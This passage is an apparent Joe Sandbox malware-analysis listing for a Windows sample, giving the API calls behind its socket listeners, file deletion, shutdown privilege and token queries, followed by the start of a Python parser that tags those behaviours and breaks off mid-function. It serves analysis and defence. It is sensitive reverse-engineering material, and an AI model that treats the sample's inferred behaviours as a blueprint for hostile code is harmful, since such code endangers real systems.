                                                                                                                      • Instruction ID: 265786f8c332500dff29d4a6090f471e9c9a17e406ef817c36ba3ce6a60d7396
                                                                                                                      • Opcode Fuzzy Hash: be04715e5e930fb0b41453439092703de6967584d708ee48b65a623dcedc859d
                                                                                                                      • Instruction Fuzzy Hash: 1C219139200610AFDB10AF24DC09BAE7BA8FF55719F11802AF9469B261DB74AC44DB54
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004C4743,?,?,004C37AE,?), ref: 004C4770
                                                                                                                        • Part of subcall function 00524A31: GetFileAttributesW.KERNEL32(?,0052370B), ref: 00524A32
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 005238A3
                                                                                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0052394B
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0052395E
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0052397B
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0052399D
                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 005239B9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 4002782344-1173974218
                                                                                                                      • Opcode ID: 85e4dcef0e2066543b64e4c1f87cff4f17a235c557f0a297e03e7716a6767bf4
                                                                                                                      • Instruction ID: a27c826b16f1fefa14c751da6f9256d73a04c258859d6089a30a557cd3eeed57
                                                                                                                      • Opcode Fuzzy Hash: 85e4dcef0e2066543b64e4c1f87cff4f17a235c557f0a297e03e7716a6767bf4
                                                                                                                      • Instruction Fuzzy Hash: F751B03580515DAACF01EFA1EA92EEDBB79AF56304F60006EE40276191EB386F49CF54
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0052F440
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0052F470
                                                                                                                      • _wcscmp.LIBCMT ref: 0052F484
                                                                                                                      • _wcscmp.LIBCMT ref: 0052F49F
                                                                                                                      • FindNextFileW.KERNEL32(?,?), ref: 0052F53D
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0052F553
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 713712311-438819550
                                                                                                                      • Opcode ID: 8da9a85f95b61fa2f8833239575fdfc9438a2d029ccb78058e1c2f253e82cc94
                                                                                                                      • Instruction ID: 4613bd8a4e8b98a57fd3879f6d27997fe8afc76bd0bdd3b39f549e72ae1d1ce0
                                                                                                                      • Opcode Fuzzy Hash: 8da9a85f95b61fa2f8833239575fdfc9438a2d029ccb78058e1c2f253e82cc94
                                                                                                                      • Instruction Fuzzy Hash: 9F41707590021AAFCF54DF68EC49AEEBBB4FF16314F14447AE815A3191DB309A44CF90
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __itow__swprintf
                                                                                                                      • String ID: 3cM$_M
                                                                                                                      • API String ID: 674341424-23921487
                                                                                                                      • Opcode ID: e3824d0973ff5247c861fc504dbd3151c4a69b2a09f9761701d16ba2f62e9a93
                                                                                                                      • Instruction ID: 978678aba87c477da3cbe7b9ace7add13aba3e137feb5cfe27fde6340da1412a
                                                                                                                      • Opcode Fuzzy Hash: e3824d0973ff5247c861fc504dbd3151c4a69b2a09f9761701d16ba2f62e9a93
                                                                                                                      • Instruction Fuzzy Hash: 152277756083019BD724DF14C891BAEBBE4BF84314F00492EF89A97391DB78EA45CB97
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: 491066e8d46c7d0e2c30ecd0da7f5856d21bdf4f9b9519c73e874803621ff882
                                                                                                                      • Instruction ID: 2676604d4b5837efd60d30abee43031a2bd2bea8eea89baf780ae305ec4eecef
                                                                                                                      • Opcode Fuzzy Hash: 491066e8d46c7d0e2c30ecd0da7f5856d21bdf4f9b9519c73e874803621ff882
                                                                                                                      • Instruction Fuzzy Hash: 5912CC70A00609DBDF04DFA6D991AEEB7B5FF48300F10456EE406E7290EB79AD90CB58
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004C4743,?,?,004C37AE,?), ref: 004C4770
                                                                                                                        • Part of subcall function 00524A31: GetFileAttributesW.KERNEL32(?,0052370B), ref: 00524A32
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00523B89
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00523BD9
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00523BEA
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00523C01
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00523C0A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 2649000838-1173974218
                                                                                                                      • Opcode ID: 3451660058b85636beb5daa77478e2b56a914de4c920f1293bacef04cbdebc37
                                                                                                                      • Instruction ID: f1b9a2972729f7edfe453aec917bb401558eb6be23cd72314ab69029f6fbd91f
                                                                                                                      • Opcode Fuzzy Hash: 3451660058b85636beb5daa77478e2b56a914de4c920f1293bacef04cbdebc37
                                                                                                                      • Instruction Fuzzy Hash: F13194390083959BC301EF24D895DAFBBA8BEA6318F404D2EF4D592191EB349A0CDB57
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 005187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0051882B
                                                                                                                        • Part of subcall function 005187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00518858
                                                                                                                        • Part of subcall function 005187E1: GetLastError.KERNEL32 ref: 00518865
                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 005251F9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                      • String ID: $@$SeShutdownPrivilege
                                                                                                                      • API String ID: 2234035333-194228
                                                                                                                      • Opcode ID: bff1f9a9690b67813fabc62d31bc3dec7bb7e34bd4d2106cb2b536c2147aefa4
                                                                                                                      • Instruction ID: c74eb68a5a34221071b21aa2cfdda68316473fbd44cf4afdeb34988254af1033
                                                                                                                      • Opcode Fuzzy Hash: bff1f9a9690b67813fabc62d31bc3dec7bb7e34bd4d2106cb2b536c2147aefa4
                                                                                                                      • Instruction Fuzzy Hash: 6201D83D691631ABF72C5268BC4AFFA7A58FF17350F500821F907E20D2FA715C009590
                                                                                                                      APIs
                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006), ref: 005362DC
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 005362EB
                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00536307
                                                                                                                      • listen.WSOCK32(00000000,00000005), ref: 00536316
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00536330
                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00536344
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279440585-0
                                                                                                                      • Opcode ID: 00f317bd5c3412be68e0c7af03ac74f8c3d82c76b6963953270beef0fa831d45
                                                                                                                      • Instruction ID: cb77f4cc170872ba441e2c79d4bbacb72c17c024fabf5b96220f975f7befaa59
                                                                                                                      • Opcode Fuzzy Hash: 00f317bd5c3412be68e0c7af03ac74f8c3d82c76b6963953270beef0fa831d45
                                                                                                                      • Instruction Fuzzy Hash: BC21C139600204AFCB10EF68C849FAEBBA9FF49724F15855DE816A7291CB74AC05DB51
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004E0DB6: std::exception::exception.LIBCMT ref: 004E0DEC
                                                                                                                        • Part of subcall function 004E0DB6: __CxxThrowException@8.LIBCMT ref: 004E0E01
                                                                                                                      • _memmove.LIBCMT ref: 00510258
                                                                                                                      • _memmove.LIBCMT ref: 0051036D
                                                                                                                      • _memmove.LIBCMT ref: 00510414
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1300846289-0
                                                                                                                      • Opcode ID: 62c8790bd0ec7e69b016e953ebd4d6d25f3581dc90c3654cf49e44c3f8c1f572
                                                                                                                      • Instruction ID: 624d0d3d6dfcf9485ff539be75a6e8d35a2cf08d83e48dc26a226f6dd9d293e6
                                                                                                                      • Opcode Fuzzy Hash: 62c8790bd0ec7e69b016e953ebd4d6d25f3581dc90c3654cf49e44c3f8c1f572
                                                                                                                      • Instruction Fuzzy Hash: 8402D1B0A00209DBDF04DF65D981AAE7BB5FF44304F10846EE80ADB395EB78D994CB95
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C2612: GetWindowLongW.USER32(?,000000EB), ref: 004C2623
                                                                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 004C19FA
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 004C1A4E
                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 004C1A61
                                                                                                                        • Part of subcall function 004C1290: DefDlgProcW.USER32(?,00000020,?), ref: 004C12D8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ColorProc$LongWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3744519093-0
                                                                                                                      • Opcode ID: 23dd84da5ae4b05f854312d7cf18723782094cb861a91e4d63b2142a41a199d9
                                                                                                                      • Instruction ID: ad999eec9931fd7bb51b362d104280dff13b1056e121e31d7d65b6e8148b662f
                                                                                                                      • Opcode Fuzzy Hash: 23dd84da5ae4b05f854312d7cf18723782094cb861a91e4d63b2142a41a199d9
                                                                                                                      • Instruction Fuzzy Hash: EBA13EB9102549BAE664AA298C48FBF295CEB83345F14011FF503D52B3DA2DDD02D6BF
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0052BCE6
                                                                                                                      • _wcscmp.LIBCMT ref: 0052BD16
                                                                                                                      • _wcscmp.LIBCMT ref: 0052BD2B
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0052BD3C
                                                                                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0052BD6C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2387731787-0
                                                                                                                      • Opcode ID: 2d6c76775793c6e3b4e439dfb93831065c6e6e2851b722787338f8c34cae8402
                                                                                                                      • Instruction ID: a8a2f6ddafafd51e8969d26a151b4baf643692fcd743d50cb41da473eb156eb7
                                                                                                                      • Opcode Fuzzy Hash: 2d6c76775793c6e3b4e439dfb93831065c6e6e2851b722787338f8c34cae8402
                                                                                                                      • Instruction Fuzzy Hash: EE519B396046129FD714DF29D490EEABBE4FF4A324F104A1EE956873A1DB34ED04CB91
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00537D8B: inet_addr.WSOCK32(00000000), ref: 00537DB6
                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 0053679E
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 005367C7
                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00536800
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0053680D
                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00536821
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 99427753-0
                                                                                                                      • Opcode ID: 0c4e0c4a01113fae5aee916e797c5955299380101541d48ee95ae10a4f1fd740
                                                                                                                      • Instruction ID: 2f4a1922adadc87cd4d5f5861c7b196c1b05c6adffec4a7f6eb134ca225466dd
                                                                                                                      • Opcode Fuzzy Hash: 0c4e0c4a01113fae5aee916e797c5955299380101541d48ee95ae10a4f1fd740
                                                                                                                      • Instruction Fuzzy Hash: A241E779A00200BFDB50BF258C8AF6E77E8EF45718F44845DF916AB3C2CA749D0187A5
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 292994002-0
                                                                                                                      • Opcode ID: 6004bd0c443c2528d1084afeb6dfde533c420ecce43813326af6e97482bdc0bc
                                                                                                                      • Instruction ID: cbf8d1644335939fe061844a0012ea74deed8bcaf2c22b77141209e2d1a54ddb
                                                                                                                      • Opcode Fuzzy Hash: 6004bd0c443c2528d1084afeb6dfde533c420ecce43813326af6e97482bdc0bc
                                                                                                                      • Instruction Fuzzy Hash: 1711E235300911AFEB206F269C48BEE7F98FF457A8B41483DF806D7242EB749C018AA4
                                                                                                                      APIs
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005180C0
                                                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005180CA
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005180D9
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005180E0
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005180F6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 44706859-0
                                                                                                                      • Opcode ID: d5ac42d8baad5f346c7aa82cd88a7766ec06fc34a9aa44e16c1f704b8f8eb213
                                                                                                                      • Instruction ID: 661edaef42a26a1e0cb12efe85f0f44d8bf11a38f1e72d1f80c78108d80b89a7
                                                                                                                      • Opcode Fuzzy Hash: d5ac42d8baad5f346c7aa82cd88a7766ec06fc34a9aa44e16c1f704b8f8eb213
                                                                                                                      • Instruction Fuzzy Hash: 86F04F35240204BFEB200FA9EC8DEFB3FACFF8A759B000025F949C6150CA619C45EB60
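                                                                                                                       The blocks above are the Joe Sandbox IDA plugin's per-function API references: each "APIs" block lists the imports a function (or one of its subcalls) reaches, with raw argument values where the plugin could recover them, followed by the string and opcode identifiers. Reading them by hand is slow, so what follows is an added triage helper, not part of the report and not Joe Sandbox code, that parses this listing shape and tags the behaviours visible in it: a TCP listener (socket(AF_INET=2, SOCK_STREAM=1, IPPROTO_TCP=6) followed by bind and listen), a UDP bind (socket type 2, protocol 0x11), ExitWindowsEx paired with the SeShutdownPrivilege string, the two-call GetTokenInformation sizing pattern with TokenGroups (class 2) plus GetLastError and HeapAlloc, FindFirstFileW/FindNextFileW enumeration, and CoCreateInstance next to a ".lnk" string. The constant interpretations come from the Windows SDK headers; the tag names and the SAMPLE text (copied in the shape of the blocks above) are this example's own constructions.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample in the shape of the report listing above (not the full report).
SAMPLE = """\
APIs
• socket.WSOCK32(00000002,00000001,00000006), ref: 005362DC
• WSAGetLastError.WSOCK32(00000000), ref: 005362EB
• bind.WSOCK32(00000000,?,00000010), ref: 00536307
• listen.WSOCK32(00000000,00000005), ref: 00536316
• closesocket.WSOCK32(00000000), ref: 00536344
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.sdmp, Offset: 004C0000, based on PE: true
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• Opcode ID: 00f317bd5c3412be68e0c7af03ac74f8c3d82c76b6963953270beef0fa831d45
APIs
• ExitWindowsEx.USER32(?,00000000), ref: 005251F9
Strings
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• Opcode ID: bff1f9a9690b67813fabc62d31bc3dec7bb7e34bd4d2106cb2b536c2147aefa4
APIs
  • Part of subcall function 00537D8B: inet_addr.WSOCK32(00000000), ref: 00537DB6
• socket.WSOCK32(00000002,00000002,00000011), ref: 0053679E
• bind.WSOCK32(00000000,?,00000010), ref: 00536800
• closesocket.WSOCK32(00000000), ref: 00536821
Similarity
• Opcode ID: 0c4e0c4a01113fae5aee916e797c5955299380101541d48ee95ae10a4f1fd740
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005180C0
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005180CA
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005180E0
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005180F6
Similarity
• Opcode ID: d5ac42d8baad5f346c7aa82cd88a7766ec06fc34a9aa44e16c1f704b8f8eb213
"""

# "• [Part of subcall function X: ]Name.MODULE(args), ref: ADDR"; args and parens are optional
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w:@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
META_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")  # "• API ID: ..." etc.


@dataclass
class Call:
    name: str
    module: str
    args: List[Optional[int]]  # None where the plugin printed '?' (value not recovered)
    ref: str
    subcall: Optional[str] = None  # address of the subcall function, if the line says so


@dataclass
class Block:
    calls: List[Call] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)


def _parse_args(raw: Optional[str]) -> List[Optional[int]]:
    if not raw or not raw.strip():
        return []
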